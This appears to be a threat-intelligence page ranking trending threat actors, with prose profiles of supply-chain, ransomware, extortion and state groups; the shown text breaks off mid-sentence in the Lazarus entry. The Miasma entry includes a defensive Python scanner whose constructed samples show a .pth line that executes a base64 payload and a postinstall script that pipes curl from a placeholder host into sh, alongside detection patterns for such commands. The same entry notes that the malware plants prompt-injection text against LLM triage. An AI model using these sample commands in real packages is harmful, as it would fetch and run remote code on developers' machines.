Mallory

Trending Adversaries

Who's moving, and how fast. Mallory tracks named threat actors across vendor reports, researcher analysis, and underground chatter, then surfaces the ones picking up momentum this week.

Ranked by Mallory's mention-velocity model across sources.

Mention map · Last week (treemap: tile size and color scaled by mention volume)

Top 24 threat actors · Last week

#1 TeamPCP

TeamPCP is a cybercrime threat actor associated with software supply chain attacks targeting open source ecosystems, developer tooling, CI/CD environments, and source code repositories. The group is described in the provided reporting as financially motivated and as having formally emerged in late 2025. Reported aliases include deadcatx3, pcpcat, persypcp, shellforce, team_pcp, and UNC6780. Across the cited reporting, TeamPCP is linked to the Mini Shai-Hulud malware/toolkit and broader Shai-Hulud activity, including later campaigns and variants such as Miasma. Multiple sources state that TeamPCP developed and then open-sourced Mini Shai-Hulud in May 2026, after which copycat activity complicated attribution for follow-on attacks. The group also reportedly announced a supply-chain attack contest on BreachForums tied to Shai-Hulud. Because Mini Shai-Hulud was publicly released, some later Miasma or Shai-Hulud-derived activity is linked to TeamPCP with varying confidence, and some reporting explicitly notes attribution uncertainty. The actor’s operations in the provided content center on compromising trusted software distribution and development workflows. Reported targets include npm and PyPI packages, GitHub repositories, GitHub Actions, open source projects, and organizations such as Microsoft, Red Hat, Aqua Security, Checkmarx, BerryAI/LiteLLM, Telnyx, Trivy, and KICS. TeamPCP is specifically tied in the content to the compromise of Microsoft’s durabletask Python package on PyPI, attacks against Trivy, KICS, LiteLLM, and Telnyx in March 2026, and claims of responsibility for a GitHub breach involving approximately 3,800 internal repositories. 
Observed tactics and techniques in the reporting include use of stolen GitHub Actions secrets and maintainer or contributor credentials; poisoning package registries; injecting malicious GitHub workflows; abusing GitHub OIDC tokens and trusted publishing paths; creating malicious pull requests and commits; deleting workflow logs; large-scale repository cloning; secret validation using TruffleHog; AWS reconnaissance; ECS Exec-based code execution in containers; exfiltration from repositories, cloud resources, and secrets stores; and malware delivery through malicious configuration files that execute when repositories are opened in AI coding tools or IDEs such as Claude Code, Gemini CLI, Cursor, and Visual Studio Code. The malware and tooling associated with TeamPCP in the content are described as credential-stealing and supply-chain focused. Mini Shai-Hulud and related activity targeted developer, cloud, package-publishing, Kubernetes, SSH, and CI/CD secrets. Reporting tied to TeamPCP also describes Linux-focused infostealer delivery via poisoned packages, theft of cloud credentials and developer tool configurations, and broader propagation through GitHub-based workflows and repositories. Sub-groups are not clearly established in the provided content, but Miasma, Mini Shai-Hulud, and Hades are described as related malware families, variants, or branches associated with or derived from TeamPCP-linked activity.

Mentions: 29
#2 Qilin
Financially Motivated

Qilin is a financially motivated ransomware-as-a-service (RaaS) operation. The content states it emerged in August 2022 under the name Agenda and is also referred to as Agenda, Gold Feather, Qilin Gang, Qilin Ransomware, Qilin Ransomware Gang, Qirin, and Water Galura. Reporting in the content says Qilin has claimed responsibility for nearly 400 victims on its dark web leak site. The group is linked in the content to ransomware intrusions and post-compromise activity, including at least one confirmed case involving a Qilin affiliate exploiting Check Point VPN vulnerability CVE-2026-50751. Check Point assessed that activity with medium confidence as tied to a Qilin affiliate based on use of the Qilin ransomware toolkit and binary analysis. In that campaign, the actor was described as financially motivated, targeted corporate VPN appliances for initial access, and was observed or suspected using dedicated VPS infrastructure, attempting to retrieve malicious ELF payloads, and possibly using the Tox protocol for communications. The same infrastructure was assessed as also probing or exploiting VPN vulnerabilities affecting Palo Alto, Fortinet, F5, and Check Point products. The content also links Qilin to the 2024 Synnovis ransomware attack, which crippled pathology services across south east London, forced hospitals to cancel thousands of appointments and operations, delayed blood testing and transfusion services, and led to publication of stolen patient data after extortion failed. The content states the outage later contributed to a patient death. Reported victim organizations named in the content include Yangfeng, Nissan, Asahi, Lee Enterprises, Synnovis, and Court Services Victoria.

Mentions: 23
#3 ShinyHunters

ShinyHunters is a financially motivated data-theft and extortion threat actor active since at least 2019 and first publicly observed in January 2020. The group is also referenced in the provided content as bling_libra, shinyhunter, shiny_hunters, UNC6040, and UNC6240. The content describes ShinyHunters as an English-speaking cybercrime collective and associates it with the broader loosely connected criminal ecosystem known as "the Com." Public reporting cited in the content also notes analytical overlap or tactical similarities with Lapsus$ and Scattered Spider. Based on the provided material, ShinyHunters specializes in data theft and extortion rather than ransomware encryption. Multiple sources in the content state that the group uses a data leak site or "pay or leak" model and excludes encryption from the kill chain. The group is described as stealing data from large organizations, cloud platforms, software environments, and third-party integrators, then demanding payment to prevent public release. Reported tradecraft in the content includes social engineering, especially voice phishing, credential theft, and targeting SaaS and enterprise cloud platforms including Salesforce, Okta, Microsoft 365, SharePoint, OneDrive, Snowflake, GainSight, SalesLoft Drift, and Canvas-related environments. Victimology and incidents directly mentioned in the content include Instructure/Canvas, DentaQuest, Baker Distributing Company, BCD Travel, Carnival Cruise, Telus Digital, Oxford University via the Canvas incident, and other Salesforce customers, schools, colleges, and universities. In the May 2026 Instructure incident, ShinyHunters claimed to have stolen 3.65 TB of data affecting up to 9,000 institutions and 275 million records; the content states the group later escalated by defacing Canvas login portals at roughly 330 institutions and conducting direct school-by-school extortion. 
Instructure said the attackers exploited a vulnerability in its Free-for-Teacher account creation system and later reached an agreement with the actor, receiving shred logs as confirmation of destruction. In May and June 2026, the group also publicly claimed or leaked data from DentaQuest, Baker Distributing, and BCD Travel through its leak site. The content further states that ShinyHunters claimed responsibility for the Carnival incident and for a breach at Telus Digital. The content also references a Google Threat Intelligence report on the expansion of ShinyHunters-branded SaaS data theft and notes that the group has used the same playbook against Ticketmaster, AT&T, and other Salesforce customers. Overall, the provided material consistently characterizes ShinyHunters as a criminal extortion brand focused on SaaS and cloud data exfiltration, credential theft, leak-site pressure, and rapid monetization of stolen enterprise and customer data.

Mentions: 16
#4 Silent Ransom Group
Financially Motivated

Silent Ransom Group (SRG) is a financially motivated cyber extortion group active since at least 2022. It is also tracked as UNC3753, Luna Moth, Chatty Spider, and Storm-0252. Reporting in the provided content describes the group as focused on data theft and extortion rather than file encryption, with historical reporting noting earlier ransomware deployment in 2022 before shifting to extortion-only operations. The group has targeted dozens of U.S.-based organizations, especially law firms and other legal, professional services, and financial services organizations. Additional reporting in the content also references targeting of insurance, healthcare, hospitality, accounting services, casino vendors, and other data-rich sectors. Multiple sources state that U.S.-based law firms have been a persistent priority target since 2023. Its tradecraft relies heavily on social engineering and legitimate remote access tooling. Reported initial access methods include benign invoice-themed or subscription-themed phishing emails, callback phishing, vishing, and direct phone calls in which operators impersonate internal IT help desk or security staff. Victims are persuaded to join screen-sharing sessions via Zoom, Microsoft Teams, Quick Assist, Microsoft Terminal Services, or similar tools, and then to install or use legitimate remote monitoring and management software including AnyDesk, Zoho Assist, Bomgar, SuperOps, Syncro, Splashtop, Atera, and RustDesk. The content also notes use of Privnote to deliver instructions and phishing domains patterned as <organization>-itdesk[.]com, <organization>-it[.]com, and <organization>-helpdesk[.]com. Once access is obtained, the group rapidly enumerates systems, mapped drives, cloud repositories, and document management platforms such as iManage, including via BYOD devices and enterprise VDI environments such as Windows 365 and Citrix.
Reported data of interest includes contracts, client agreements, tax records, audit files, W-2/W-9/1099 records, Social Security numbers, personally identifiable information, merger and acquisition files, and other sensitive legal and financial documents. Exfiltration methods described in the content include WinSCP, Rclone, FTP, browser-based uploads to attacker-controlled cloud storage, victim email accounts, Google Drive, Microsoft OneDrive, and in some cases removable media. Multiple reports state the group often moves from initial contact to exfiltration and extortion within a single business day, and in some incidents in under an hour. The content also describes an unusual escalation to physical intrusion. FBI and Google reporting state that when remote social engineering fails, individuals linked to the group have appeared at victim offices posing as IT support staff, claiming they need to image devices or create backups, then inserting USB or other storage devices to steal data. Some reporting notes that formal attribution of every in-person incident was limited by forensic evidence, but assessed the activity as likely linked to UNC3753 based on overlaps in timing, structure, and targeting. After exfiltration, the group issues aggressive extortion demands, often within about 30 minutes of leaving the victim environment, typically giving victims three days to respond. Threats include public disclosure of stolen data, contacting employees, clients, partners, customers, or media, and publication on its leak infrastructure. The content references the LEAKEDDATA branding and the leak site business-data-leaks[.]com, with reporting that the group used the LeakedData name publicly until December 2024 and that close to 100 victim organizations were listed by June 2026. The provided content also links Silent Ransom Group to the broader Conti ecosystem, with overlaps to UNC2686 and earlier BazarCall-style tradecraft. 
Some reporting explicitly describes the group as a Conti offshoot or as emerging after Conti’s 2022 collapse. Resecurity reporting in the content further states that the group uses fast-flux infrastructure backed by rotating residential IP space and compromised routers/modems across multiple countries to support its leak infrastructure and resist takedown.

Mentions: 11
#5 NSO Group

NSO Group is an Israeli spyware company and private sector offensive actor known for developing Pegasus spyware; it is also referred to in the content as NSO, Pegasus, and Q Cyber Technologies. Microsoft maps NSO Group to Night Tsunami (formerly DEV-0336) in its private sector offensive actor taxonomy. The group is repeatedly linked to surveillance operations and exploit development targeting mobile devices and messaging platforms. Reported targets in the content include WhatsApp users, Apple users, journalists, human rights activists and defenders, lawyers, political dissidents, diplomats, government officials, military personnel, humanitarian workers, and other civil society members. The content directly links NSO Group to multiple Pegasus delivery and exploitation methods. These include the 2019 WhatsApp zero-click campaign exploiting CVE-2019-3568 / a WhatsApp audio-calling or VOIP stack vulnerability to compromise approximately 1,400 users; one-click and spear-phishing campaigns using malicious links and social engineering; iMessage-based zero-click exploitation associated with the ForcedEntry exploit and CVE-2021-30860; and a reported mobile-network technique referred to as "MMS Fingerprint" for device and OS fingerprinting without user interaction. Pegasus is described in the content as spyware or a remote access trojan capable of extracting messages, calls, photos, location data, contacts, browser history, screenshots, passwords, and communications from apps, and of activating cameras and microphones. The content states that WhatsApp/Meta sued NSO Group in 2019 over abuse of WhatsApp infrastructure to deliver Pegasus, that courts found NSO Group violated U.S. hacking laws, and that a permanent injunction barred NSO Group from targeting WhatsApp and its users. 
Despite that, Meta and WhatsApp said they later detected and disrupted additional NSO-linked social engineering and spear-phishing activity involving malicious external links, as well as test accounts and groups on WhatsApp, with reported targeting of a small number of users in Jordan and Lebanon. The content also states that Apple sued NSO Group, alleging Pegasus was used to attack a small number of Apple users worldwide. NSO Group is described in the content as being on the U.S. Commerce Department Entity List / blacklist for activity found contrary to U.S. national security or foreign policy interests. Known aliases and related names directly mentioned in the content include NSO, Pegasus, Q Cyber Technologies, Q Suite, and Microsoft’s Night Tsunami / DEV-0336 designation.

Mentions: 7 · Origin: IL
#6 Contagious Interview

Contagious Interview is a North Korea-aligned threat actor/campaign cluster focused on software developers, especially those connected to cryptocurrency projects and digital financial platforms. It is also tracked under aliases including UNC5342, Famous Chollima, Void Dokkaebi, DeceptiveDevelopment, BeaverTail, InvisibleFerret, OtterCookie, DEV#POPPER, Gwisin Gang, and Tenacious Pungsan. The reporting directly associates it with DPRK activity and repeatedly describes it as targeting developers through fake job interviews, recruiter outreach, coding assignments, code review requests, and compromised open-source packages. Across the cited reporting, the cluster targets developers globally, with repeated emphasis on cryptocurrency, DeFi, finance, technology, education, and business services. Observed objectives include theft of credentials, browser data, cryptocurrency wallets, seed phrases, private keys, cookies, keychain/keyring material, SSH keys, Telegram sessions, and other sensitive developer or enterprise data. Some reporting also links stolen data and identities to North Korean fraudulent IT worker schemes. Tradecraft directly mentioned in the content includes social engineering via fake recruiter personas and job-interview lures; malicious GitHub and GitLab repositories; trojanized coding challenges; compromised npm and Packagist packages; hidden VS Code task execution via .vscode/tasks.json; malicious VSIX extensions for persistence; and blockchain-based dead-drop or command-and-control techniques using networks such as TRON, Aptos, BNB Smart Chain, Ethereum, Base, and Optimism. Malware and tooling associated in the content include BeaverTail, InvisibleFerret, OtterCookie, DEV#POPPER, MicrosoftSystem64, Tropidoor, TsunamiKit, and activity overlaps involving Overlord-derived tooling in related clusters. 
Additional techniques described include obfuscated JavaScript loaders, hexadecimal string encoding, XOR-encrypted payload retrieval, eval()-based execution, browser and wallet theft, fake password prompts, keychain and GNOME Keyring dumping, Windows DPAPI/App-Bound Encryption bypass, and persistence through scheduled tasks, LaunchAgents, systemd services, or malicious editor extensions. The content also notes subgroup or related-cluster distinctions. Proofpoint observed strong overlaps between UNK_DeadDrop and Contagious Interview in victimology, social engineering, and cryptocurrency theft, but tracked UNK_DeadDrop separately due to lack of direct infrastructure overlap and differences in delivery and payloads. Elastic reporting states PHANTOMPULSE aligns with DPRK-linked crypto-targeting clusters including Lazarus, BlueNoroff, UNC5342/Contagious Interview, and APT38. ESET reporting states DeceptiveDevelopment overlaps with Contagious Interview and WageMole, and CrowdStrike tracks a related gang as Famous Chollima.

Mentions: 6 · Origin: KP
#7 LockBit

LockBit is a financially motivated ransomware-as-a-service (RaaS) operation and cybercriminal group, widely referenced as one of the most active and destructive ransomware groups globally. The content states LockBit first appeared around January 2020 and, between January 2020 and February 2024, attacked more than 2,500 victims in at least 120 countries, including about 1,800 in the United States. Reported victims included individuals, small businesses, multinational corporations, hospitals, schools, nonprofit organizations, critical infrastructure, and government and law-enforcement agencies. The group extorted at least approximately $500 million in ransom payments and caused billions of dollars in additional losses. LockBit operated as a RaaS model in which the administrator recruited affiliates to conduct intrusions, steal data, encrypt systems, and threaten publication of stolen data on LockBit-controlled leak sites if victims did not pay. The content states the administrator typically received 20% of each ransom payment and affiliates received 80%. LockBit is described as using double extortion and maintaining public leak infrastructure. The group has been associated in the content with use of Mimikatz and PsExec, abuse of legitimate remote administration tools such as AnyDesk for persistence and GoToResolve in campaigns linked to LockBit operations, and targeting of VMware ESXi environments. The content also notes LockBit affiliates unlawfully accessed vulnerable systems, stole data, encrypted stored data, and communicated with victims using infrastructure including email addresses, IP addresses, and online accounts. The content identifies Dmitry Yuryevich Khoroshev, also known as LockBitSupp, LockBit, and putinkrab, as the alleged creator, developer, administrator, and public spokesperson of LockBit from as early as September 2019 through 2024. 
It also names charged or identified affiliates and participants including Ruslan Magomedovich Astamirov and Mikhail Vasiliev, and references Mikhail Matveev as an affiliate of LockBit and other ransomware groups. Astamirov used the aliases BETTERPAY, offtitan, and Eastfarmer. Vasiliev used the aliases Ghostrider, Free, Digitalocean90, Digitalocean99, Digitalwaters99, and Newwave110. The group is repeatedly described in the content as Russia-based or Russian-speaking. One source states multiple ransomware groups including LockBit 2.0/3.0 are based in Russia, and another notes LockBit operators expressly prohibit affiliates from targeting Russian and other CIS organizations. The content also states LockBit remained neutral in the Russia-Ukraine conflict while some other ransomware gangs sided with Russia. Known aliases and variants directly referenced in the content include LockBit 2.0, LockBit 3.0, LockBit Black, LockBit Green, LockBit 4.0, LockBit 5.0, LockBit Gang, LockBit Group, and LockBitSupp. The content also references versioned naming such as LockBit 2.0/3.0 and specifically identifies LockBit 3.0 in connection with attacks on healthcare. Law enforcement significantly disrupted LockBit in February 2024 through Operation Cronos, led by the U.K. National Crime Agency with support from the U.S. DOJ, FBI, and international partners. Authorities seized LockBit websites and servers, developed decryption capabilities for victims, and the disruption significantly diminished the group’s reputation and operational capacity. However, the content states LockBit restarted operations about a week later, stood up new leak sites, and used updated encryptors and ransom notes. The content also states that seized infrastructure showed stolen victim data had been retained even after ransom payments and promises of deletion.

Mentions: 6
#8 TA4922

TA4922 is a Chinese-speaking, likely East Asia-based threat actor tracked by Proofpoint since spring 2025 and assessed as primarily financially motivated. Proofpoint describes the group as a cybercrime operation rather than an espionage actor, although it notes overlap in tooling, infrastructure, and social engineering with Silver Fox and Void Arachne, and some malware capabilities could support surveillance. TA4922’s objectives are reported as obtaining remote access for monetization, including fraud, data theft, access brokering or resale, and persistence. TA4922 historically targeted organizations in East Asia, especially Japan, and has also targeted Taiwan, South Korea, Singapore, Malaysia, Indonesia, India, and Italy. By early 2026 it expanded targeting into Europe and Africa, including the United Kingdom, Germany, Italy, and South Africa. Proofpoint reported that the actor maintains a very high operational tempo and conducts more unique campaigns than any other cybercrime actor in its tracking. The actor relies heavily on localized phishing and impersonation. Observed lures include tax authority, payroll, HR, salary adjustment, benefits, compliance, invoice, and general business themes, often written in local languages and dialects. TA4922 also attempts to move victims from email to out-of-band platforms including LINE, WhatsApp, and Microsoft Teams to continue social engineering, harvest contact information, and deliver malware outside normal email security visibility. Proofpoint also observed tax-themed campaigns in which TA4922 impersonated national tax authorities, requested phone numbers, and then escalated contact by impersonating finance leadership. TA4922 uses diverse delivery and execution chains, including malicious links, archive attachments, cloud-hosted files, shortened URLs, direct executables, credential-phishing pages, DLL sideloading, and abuse of legitimate remote monitoring and management tools such as AnyDesk and SyncFuture. 
The group has used sender infrastructure at scale, including thousands of disposable sender addresses, often via Outlook, Hotmail, and Gmail accounts. Malware associated with TA4922 includes ValleyRAT/Winos4.0, Atlas RAT, RomulusLoader, and SilentRunLoader. ValleyRAT is described as part of the Winos4.0 ecosystem and provides full remote access functionality; Proofpoint also observed a heavily modified Winos4.0 variant in early 2026. Atlas RAT is a modular backdoor used against higher-value targets with capabilities including system reconnaissance, arbitrary command execution, file upload and management, plugin and payload loading, keylogging, screenshot capture, clipboard theft, audio recording, webcam capture, and system shutdown or reboot. Atlas RAT also performs anti-sandbox and anti-analysis checks. RomulusLoader is a C-based loader used to download and execute follow-on payloads and to deploy legitimate RMM software. Reported behaviors include masquerading as legitimate components such as Vulkan Graphics API or AnyDesk utilities, DLL sideloading, persistence via common system directories, shellcode execution, process injection into legitimate processes such as svchost.exe and dllhost.exe, process hollowing, and download-and-execute functionality. SilentRunLoader is a compiled Python-based loader and stealer focused on Google Chrome data theft. It harvests stored credentials, cookies, and browsing history, archives the data, and uploads it to actor-controlled infrastructure. Proofpoint assessed with high confidence that TA4922 likely uses large language models to accelerate development of some newer Python malware, citing placeholder values and coding artifacts in SilentRunLoader. Known aliases and related names mentioned in reporting include ValleyRAT/Winos4.0, Atlas RAT/AtlasCross RAT, and ecosystem overlap with Silver Fox and Void Arachne. Proofpoint tracks TA4922 as a distinct threat cluster.

Mentions: 6 · Origin: CN
#9 Conti

Conti was a Russia-linked ransomware-as-a-service operation and cybercrime syndicate active from 2020 until its apparent disbanding in 2022. The group was responsible for large-scale double-extortion ransomware attacks, stealing data before encrypting systems and threatening to publish stolen information on its leak site. U.S. government reporting cited more than 400 attacks between spring 2020 and spring 2021, mostly against U.S. organizations, and later described Conti as the costliest ransomware strain on record, with more than 1,000 victims and over $150 million in payouts as of January 2022. Reported victims and target sectors included healthcare, first-responder networks, public-sector entities, law enforcement, emergency medical services, and the government of Costa Rica; the group also attacked Ireland’s Health Service Executive and organizations in New Zealand. The group operated as a business-like RaaS enterprise with core operators and affiliates. Leaked internal chats and source code exposed its organizational structure, bitcoin addresses, law-enforcement evasion, attack methods, administrative panel, BazarBackdoor API, and ransomware encryptor, decryptor, and builder. Reporting also linked Conti to the broader TrickBot/BazarBackdoor ecosystem, and campaigns identified by Google and others tied Conti-associated activity to BazarCall and Diavol. In March 2022, Google reported on BUMBLEBEE as malware linked to Conti’s initial access broker. Conti publicly declared support for the Russian government after the invasion of Ukraine in February 2022, later revising its statement while still threatening retaliation. Multiple sources in the content describe the group as based in Russia or Russia-linked, and one source characterizes it as a Russian government-linked RaaS operation. Following its political stance, a Ukrainian researcher leaked extensive internal Conti communications and source code, causing major reputational and operational damage. 
The group shut down internal infrastructure in May 2022 and appears to have disbanded in 2022. The content states that former Conti members and affiliates shifted into successor or offshoot groups including Black Basta, Royal, UNC3753 / Silent Ransom Group / Luna Moth / Chatty Spider, UNC2686, Quantum, Hive, and ALPHV. Black Basta is described as a successor to Conti, Royal as a direct successor, and UNC3753 and UNC2686 as offshoots of the now-defunct Conti ransomware gang.

Mentions: 6
#10 Sandworm

Sandworm is a Russia-aligned threat actor identified in the content as APT44 and GRU Unit 74455, and described as an offensive cyber unit within Russia’s military intelligence service GRU. Reported aliases in the provided content include Seashell Blizzard, TeleBots, BlackEnergy, Electrum, Iridium, Iron Viking, Blue Echidna, FrozenBarents, Voodoo Bear, and Unit 74455. The content links Sandworm to destructive and disruptive operations against Ukraine and other targets, especially critical infrastructure and energy organizations. It attributes to Sandworm the 2015 Ukraine power outage using BlackEnergy 3 to access a Ukrainian power company network and pivot to SCADA systems; the 2016 Ukraine Electric Power Attack, where the group used WMI for remote execution and system surveys, PowerShell scripts to run a credential-harvesting tool in memory, xp_cmdshell in MS-SQL, and LDAP queries against Active Directory; the 2018 Olympic Destroyer attack against the PyeongChang Winter Olympics, which disrupted Wi‑Fi, ticketing systems, the official app, and the event website; the 2022 attempted attack on a Ukrainian energy company using Industroyer2 and the wipers CaddyWiper, Orcshred, Soloshred, and Awfulshred; and use of Prestige to delete backup catalogs and volume shadow copies. The content also states Sandworm exploited CVE-2014-4114/CVE-2014-6352, may have exploited Follina (CVE-2022-30190) against more than 500 Ukrainian media recipients with medium confidence, and has been reported exploiting CVE-2025-8088 alongside other Russia-aligned actors. 
Additional tradecraft directly mentioned includes use of BLACKENERGY 3 malware, Telegram Bot API for command and control, abuse of legitimate M.E.Doc update requests and putdrive.com for payload hosting and C2, exfiltration of internal documents and files, naming a malicious binary explorer.exe to evade detection, use of Impacket WMIexec for remote code execution, VBScript to run WMI queries, browser credential theft via CredRaptor, and modification of in-registry internet settings to lower internet security. The content also notes Sandworm intensified destructive activity in winter 2025–2026, deploying several new wipers in Ukraine against governmental and private-sector targets, and attributes with medium confidence a December 2025 data-destruction incident affecting a Polish energy company to Sandworm.

Mentions: 5 · Origin: RU
#11 Handala

Handala is an Iranian-linked threat actor widely assessed by the FBI, the U.S. Department of Justice, and multiple commercial threat intelligence firms to be a front for Iran’s Ministry of Intelligence and Security (MOIS). It is also tracked as Void Manticore, Red Sandstorm, Storm-0842, Banished Kitten, Dune, Homeland Justice, Handala Hack Team, and Handala Hack Team/Handala Popular Resistance Front (HPRF) in related reporting. Content also describes Void Manticore personas including Handala Hack Team, KarmaBelow, and Homeland Justice. The group presents itself as an independent pro-Palestinian or hacktivist actor, but the provided reporting consistently links it to MOIS. Since late 2023, Handala has used Telegram and hack-and-leak branding to target Israeli officials, government agencies, security institutions, technology companies, critical infrastructure, and, increasingly, U.S. targets. Reported targets include Israeli leadership, Israeli police databases, security organizations, technology companies, nuclear-related entities, Iran International, U.S. government personnel, U.S. Marine Corps personnel, county government infrastructure, and Stryker, a U.S. medical technology company. Confirmed or reported capabilities in the provided content include hack-and-leak operations, credential theft, abuse of legitimate enterprise management tools, ransomware used primarily for psychological impact rather than extortion, destructive wiper activity, and lateral movement via RDP. In the March 11, 2026 Stryker attack, Handala/Void Manticore reportedly compromised Microsoft Intune administration, created a Global Administrator account, and used Intune remote wipe functionality to erase large numbers of devices; Stryker stated the incident was contained to its internal Microsoft environment and did not affect medical products. The content also states that Void Manticore collected cached data and files from victim environments. 
The actor has also made public claims of operations against Israeli military and civilian targets during the 2026 Iran-Israel conflict, including alleged disruption of radar or signal networks and attacks on Kfar Yona municipality, but the provided reporting says those specific June 2026 radar-related claims were unsubstantiated or exaggerated and that the evidence published appeared consistent with access to a Tadiran Telecom Aeonix IVR/telephone administration panel rather than military radar infrastructure. The content further states that MOIS has likely expanded the Handala brand beyond cyber operations to encompass influence and physical-threat activity targeting U.S. and Israeli interests. Under the Handala brand, HPRF and related personas allegedly solicited individuals for espionage and physical attacks for payment, and HPRF claimed responsibility for an April 26, 2026 arson attack targeting an Israeli law enforcement official’s vehicle. Reporting cited here assesses that MOIS is using the Handala brand as a reusable operational persona spanning cyber, influence, espionage, and physical threat activity.

Mentions: 5 · Origin: IR
#12 Miasma

Miasma is a self-replicating software supply chain threat cluster assessed in the provided reporting as a variant or rebrand of Mini Shai-Hulud, with Hades described as its latest evolution; Mini Shai-Hulud and Hades are the related clusters and aliases named in the content. The activity has targeted the npm and PyPI ecosystems and has extended to direct compromise of GitHub repositories. Reported victims and targets include developer workstations, CI/CD environments, Microsoft-owned GitHub repositories, the @redhat-cloud-services npm namespace, and packages in computational biology, bioinformatics, genotype-phenotype analysis, MCP/AI-themed ecosystems, and widely used components such as ensmallen and durabletask. Across the reporting, Miasma is described as using self-replicating worm behavior, malicious package publication through legitimate authenticated channels, and GitHub repository abuse for propagation. Observed techniques include trojanized npm and PyPI packages; Python .pth startup hooks in site-packages, which the interpreter executes on every start; malicious native extension import triggers; Bun/JavaScript payloads hidden behind eval-based obfuscation and substitution ciphers; execution on folder access in IDEs or by AI agents; direct repository backdooring that triggers through Claude Code, Gemini CLI, Cursor, VS Code, and npm test scripts; multi-cloud credential sweeps; Linux process memory scanning and reading; cross-platform memory scraping; SSH/SCP-based lateral movement; GitHub Actions workflow abuse; abuse of OIDC trusted publishing (the CI-to-registry trust relationship) to mint package publishing tokens; and persistence via background services. The malware is also reported to embed fake prompt-injection text or hidden prompts intended to disrupt LLM-assisted analysis and triage.
The payloads described in the content steal secrets from developer and CI/CD environments, including GitHub, npm, PyPI, RubyGems, and JFrog tokens; AWS, Azure, and GCP credentials; Kubernetes material; SSH keys; Docker configurations; shell histories; .env files; and AI developer tool configurations. Reporting also states that Miasma creates public GitHub repositories and commits harvested secrets into victim-owned or attacker-controlled repositories for exfiltration and propagation. The latest Hades evolution is additionally described as including wiper capability tied to token revocation monitoring. The content characterizes this activity as an ongoing, fast-moving, mass-propagating supply chain campaign that abuses the trust model of open-source package registries and code hosting platforms rather than exploiting platform vulnerabilities.
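Two of the startup triggers listed above, the Python .pth hook and the npm lifecycle/test script, can be hunted for on a workstation or build agent without any vendor tooling. The scanner below is an added example, not code from the cited reports or from any of the named projects. It relies on two documented behaviours: CPython's site module exec()s every line of a site-packages *.pth file that begins with "import", and npm runs preinstall/install/postinstall/prepare on `npm install` and "test" on `npm test`. The token lists, the benign-file allowlist and the sample inputs are this example's assumptions.

```python
"""Scan for Python .pth startup hooks and npm lifecycle/test-script triggers.

Added example (not tooling from the cited reporting). The heuristics,
the allowlist and the constructed samples are assumptions of this example.
"""
import json
import re
import sys
import sysconfig
from pathlib import Path

# A benign .pth import line registers a path hook or shim; none of these
# tokens belong in one.
PTH_SUSPICIOUS = re.compile(
    r"\b(exec|eval|compile|__import__|base64|b64decode|subprocess|system|popen|"
    r"socket|urllib|requests|http\.client|marshal|zlib|codecs)\b"
)
# Well-known .pth files that legitimately carry import lines (setuptools,
# virtualenv); review them once, then skip them.
KNOWN_BENIGN_PTH = {"distutils-precedence.pth", "_virtualenv.pth"}

NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish", "pretest", "test")
NPM_SUSPICIOUS = re.compile(
    r"(\b(curl|wget|eval|base64|powershell)\b|\bnode\s+-e\b|\bbun\s+(-e|run)\b|"
    r"\bsh\s+-c\b|\|\s*(sh|bash|node|bun)\b|(^|\s)\./\.[\w.-]+)"
)


def scan_pth_text(text: str) -> list[str]:
    """Return one finding per executable .pth line that looks like a hook."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line.startswith("import"):
            continue  # plain lines are only appended to sys.path
        if PTH_SUSPICIOUS.search(line) or ";" in line or len(line) > 200:
            findings.append(f"line {lineno}: executable .pth hook: {line[:80]}")
    return findings


def scan_package_json(pkg: dict) -> list[str]:
    """Return one finding per lifecycle/test script that fetches or evals code."""
    findings = []
    scripts = pkg.get("scripts") or {}
    for hook in NPM_HOOKS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str) and NPM_SUSPICIOUS.search(cmd):
            findings.append(f"scripts.{hook}: {cmd[:80]}")
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk root for *.pth and package.json files and collect findings."""
    results = {}
    for pth in root.rglob("*.pth"):
        if pth.name in KNOWN_BENIGN_PTH:
            continue
        hits = scan_pth_text(pth.read_text(errors="replace"))
        if hits:
            results[str(pth)] = hits
    for pj in root.rglob("package.json"):
        try:
            hits = scan_package_json(json.loads(pj.read_text(errors="replace")))
        except (json.JSONDecodeError, UnicodeDecodeError):
            continue
        if hits:
            results[str(pj)] = hits
    return results


# Constructed samples (not real malware): a .pth that decodes and executes
# a payload at interpreter start, and a package.json whose postinstall
# fetches a remote script and whose test hook runs a hidden Bun file.
SAMPLE_PTH = (
    "/opt/venv/lib/python3.12/site-packages/legit_pkg\n"
    "import base64,sys;exec(base64.b64decode('PAYLOAD_B64'))\n"
)
SAMPLE_PACKAGE_JSON = {
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": "node -e \"require('child_process').exec('curl -s https://example.invalid/x | sh')\"",
        "test": "bun run ./.hidden/setup.js && jest",
    },
}

if __name__ == "__main__":
    # Default to the active interpreter's site-packages and the current checkout.
    roots = [Path(p) for p in sys.argv[1:]] or [Path(sysconfig.get_paths()["purelib"]), Path.cwd()]
    for root in roots:
        for path, hits in scan_tree(root).items():
            print(path)
            for hit in hits:
                print("   ", hit)
```

Run it against every virtualenv and every cloned repository on a build agent, not just the project directory: the .pth trigger fires from whichever site-packages the CI job's interpreter uses. Expect to triage the setuptools and virtualenv shims once, then keep them in the allowlist.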

Mentions: 5
#13 Lazarus

Lazarus Group is a North Korean (DPRK) state-sponsored threat actor associated with financially motivated and espionage activity, especially against cryptocurrency, financial, and developer ecosystems. Known aliases in the provided content include APT-C-26, BadClone, Black Artemis, Copernicium, Diamond Sleet, Genie Spider, Guardians of Peace, Hidden Cobra, Labyrinth Chollima, Lazarus APT, Lazarus Group, Nickel Academy, Nickel Gladstone, Pukchong, PurpleBravo, Selective Pisces, Stardust Chollima, Storm-0139, Storm-0954, Storm-1222, Storm-1877, TA404, TAG-121, TempHermit, UNC2970, WaterPlum, and Zinc. The content also references related or overlapping DPRK-linked clusters and subgroups including BlueNoroff, APT38, TraderTraitor/UNC4899, AppleJeus, Citrine Sleet/UNC4736, Gleaming Pisces, and DeceptiveDevelopment. In the provided reporting, Lazarus is linked to major cryptocurrency theft and laundering operations, including attribution for the February 2025 Bybit theft exceeding $1.4 billion after compromise of the Safe{Wallet} transaction approval workflow and injection of malicious JavaScript into the Safe web interface. The content also states that TraderTraitor, tracked as UNC4899 and described as part of the broader Lazarus Group, was attributed in LayerZero reporting to a roughly $292 million Kelp DAO/LayerZero bridge 